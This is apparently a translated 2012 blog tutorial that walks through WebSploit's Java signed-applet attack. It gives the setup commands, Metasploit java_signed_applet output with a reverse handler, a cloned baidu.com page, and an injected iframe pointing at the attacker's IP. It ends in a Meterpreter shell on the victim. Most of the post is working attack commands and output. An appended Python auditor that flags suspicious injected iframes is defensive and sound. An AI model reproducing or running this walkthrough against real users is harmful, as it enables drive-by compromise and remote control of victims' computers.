177 WebSploit 1 Java Applet Attack
Posted on 2012-10-2 10:57:51
WebSploit, a general-purpose network toolkit. Video: http://www.3g-sec.com/shiping/177-2.zip

    root@Dis9Team:/tmp# axel -n 10 http://iweb.dl.sourceforge.net/project/websploit/WebSploit%20Toolkit%20V.1.9/WebSploit%20Toolkit%20V.1.9.tar.gz
    root@Dis9Team:/tmp# tar xf WebSploit\ Toolkit\ V.1.9.tar.gz
    root@Dis9Team:/tmp# cp -rf WebSploit\ Toolkit\ V.1.9 /pen/WebSploit
    root@Dis9Team:/tmp# cd /pen/WebSploit/
    root@Dis9Team:/pen/WebSploit# ./websploit


Java browser attack

    ID & Name                   Description
    ------------                --------------
    [1]WebSite Attack Vector    Scanners,Crawlers For WebSite
    [2]Network Attack Vector    Network Attack Tools
    [3]Automatic Exploiter      Automatic Exploit Vulnerability
    [4]Format Infector          Inject Custom Payload Into File Formats
    [5]Web Tools                WebSite Tools

    [88]Update                  Update WebSploit Toolkit
    [99]Exit                    Exit


    wsf > 2

Select 2, Network Attack Vector.

    ID & Name                   Description
    ------------                --------------
    [1]MITM                     Man In The Middle Attack
    [2]MLITM                    Man Left In The Middle,XSS Phishing Attack
    [3]Java Applet Attack       Java Signed Applet Attack
    [4]MFOD                     Middle Finger Of Doom Attack
    [5]ARP DOS                  ARP Cache Denial Of Service Attack With Random MAC
    [6]Web Killer               Using From The TCPKill For Down Your WebSite On Network

    [99]Main Menu               Go To Main Menu

Select 3, the Java applet attack.


    [*]Java Signed Applet Attack
    [*]Interface Name (ex : eth0,Wlan0 ...)
    wsf:Java Applet > Enter Interface Name : eth1
    wsf:Java Applet > Enter Your IP Address : 5.5.5.2
    [*]Enter Java Signed Windows Information (Display In Victim Browser)
    wsf:Java Applet > Enter Main Applet's Class Name : door
    wsf:Java Applet > Enter Name Of Publisher : door
    [*]Setting Up , Wait A Few Seconds ...
    [*]Your Index Has Been Changed...
    [*]You Can Change The Index From Here => /var/www/index.html
    [*]But Don't Forget Your IP Address, Write It In <iframe> Tag
    [*]Engine Has Been Started ... Wait For Victim Click ...
    [*] Please wait while we load the module tree...

Enter the network interface, the local IP address, and the name for the Java trojan.

Metasploit is then loaded:

    APPLETNAME => door
    CERTCN => door
    URIPATH => index
    [*] Exploit running as background job.

    [*] Started reverse handler on 10.0.3.15:4444
    msf  exploit(java_signed_applet) >
    msf  exploit(java_signed_applet) >
    [*] Using URL: http://0.0.0.0:8080/index
    [*]  Local IP: http://10.0.3.15:8080/index
    [*] Server started.
    [*] 5.5.5.3          java_signed_applet - Handling request

    root@Dis9Team:~# cd /var/www/
    root@Dis9Team:/var/www# nano index.html

Edit index.html…

    <iframe src=http://5.5.5.2:8080/index></iframe>

This line is the key part; do not delete it. For example, mine:

    root@Dis9Team:/var/www# wget -k www.baidu.com -O index.html
    root@Dis9Team:/var/www# echo "<iframe src=http://5.5.5.2:8080/index></iframe>" >> index.html

It must be two characters, >>; a single > overwrites the file.


Run it and get a shell


    msf  exploit(java_signed_applet) > [*] 5.5.5.3          java_signed_applet - Handling request
    [*] 5.5.5.3          java_signed_applet - Sending door.jar. Waiting for user to click 'accept'...
    [*] Sending stage (752128 bytes) to 5.5.5.3
    [*] Meterpreter session 1 opened (5.5.5.2:1111 -> 5.5.5.3:1405) at 2012-07-11 13:16:49 -0700

    msf  exploit(java_signed_applet) > sessions -i 1
    [*] Starting interaction with 1...

    meterpreter >



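Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a blade.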
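
From the defender's side, the iframe appended with >> in the post lands after the page's closing </html> tag and points at a bare IP address on port 8080, and both traits can be checked for in served pages. The following Python check is an added example, not part of the original post; the heuristics, the names `IframeAudit` and `audit`, and the sample HTML are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

class IframeAudit(HTMLParser):
    """Flag iframes that look appended or that point at a raw IP/odd port."""
    def __init__(self):
        super().__init__()
        self.html_closed = False   # becomes True once </html> has been seen
        self.findings = []         # list of (src, [reasons])

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        src = dict(attrs).get("src") or ""
        # Content appended to a file ends up after the closing </html> tag.
        reasons = ["after-closing-html"] if self.html_closed else []
        try:
            parts = urlsplit(src)
            host, port = parts.hostname or "", parts.port
        except ValueError:         # malformed URL or port
            host, port = "", None
        try:
            ipaddress.ip_address(host)
            reasons.append("ip-literal-host")
        except ValueError:         # a hostname (or empty), not an IP literal
            pass
        if port not in (None, 80, 443):
            reasons.append("non-standard-port")
        if reasons:
            self.findings.append((src, reasons))

def audit(html_text):
    """Return the suspicious iframes found in one HTML document."""
    parser = IframeAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings

# Constructed sample: a cloned page with one iframe appended at the end.
SAMPLE = (
    "<html><body><h1>portal</h1>"
    "<iframe src='https://www.example.com/widget'></iframe>"
    "</body></html>\n"
    "<iframe src=http://5.5.5.2:8080/index></iframe>\n"
)
```

Run `audit()` over the files in a web root and compare against a known-good baseline; an iframe with any of these reasons on a page that never had one warrants a closer look.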
